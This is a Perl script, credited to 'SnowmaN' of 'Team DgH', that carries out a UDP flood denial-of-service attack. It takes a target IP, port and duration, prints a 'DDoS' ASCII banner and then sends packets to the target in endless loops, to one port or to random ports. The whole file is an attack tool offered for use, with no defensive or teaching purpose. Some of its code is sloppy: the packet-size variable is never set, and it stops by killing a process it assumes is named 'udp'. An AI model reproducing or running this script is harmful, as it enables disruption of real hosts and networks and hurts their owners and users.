#!/usr/bin/perl


use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "To initiate a UDP Flood\n";
 printf "perl $0 ip port time\n";
 printf "Coded by SnowmaN\n";
 printf "Team DgH is Running 2013\n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

print <<EOTEXT;

DDDDDDDDDDDDD      DDDDDDDDDDDDD                            SSSSSSSSSSSSSSS 
D::::::::::::DDD   D::::::::::::DDD                       SS:::::::::::::::S
D:::::::::::::::DD D:::::::::::::::DD                    S:::::SSSSSS::::::S
DDD:::::DDDDD:::::DDDD:::::DDDDD:::::D                   S:::::S     SSSSSSS
  D:::::D    D:::::D D:::::D    D:::::D    ooooooooooo   S:::::S            
  D:::::D     D:::::DD:::::D     D:::::D oo:::::::::::oo S:::::S            
  D:::::D     D:::::DD:::::D     D:::::Do:::::::::::::::o S::::SSSS         
  D:::::D     D:::::DD:::::D     D:::::Do:::::ooooo:::::o  SS::::::SSSSS    
  D:::::D     D:::::DD:::::D     D:::::Do::::o     o::::o    SSS::::::::SS  
  D:::::D     D:::::DD:::::D     D:::::Do::::o     o::::o       SSSSSS::::S 
  D:::::D     D:::::DD:::::D     D:::::Do::::o     o::::o            S:::::S
  D:::::D    D:::::D D:::::D    D:::::D o::::o     o::::o            S:::::S
DDD:::::DDDDD:::::DDDD:::::DDDDD:::::D  o:::::ooooo:::::oSSSSSSS     S:::::S
D:::::::::::::::DD D:::::::::::::::DD   o:::::::::::::::oS::::::SSSSSS:::::S
D::::::::::::DDD   D::::::::::::DDD      oo:::::::::::oo S:::::::::::::::SS 
DDDDDDDDDDDDD      DDDDDDDDDDDDD           ooooooooooo    SSSSSSSSSSSSSSS   

EOTEXT
print <<EOTEXT;
                 .:: DDoS Attack Sent Successfully ::.
               DgH By SnowmaN On Port 53 Random. Get @ Me.


EOTEXT
printf "~SnowmaN RuNz Your Modem/Router!~ $ip on port $port\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

packets:
for (;;) {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

randpackets:
for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}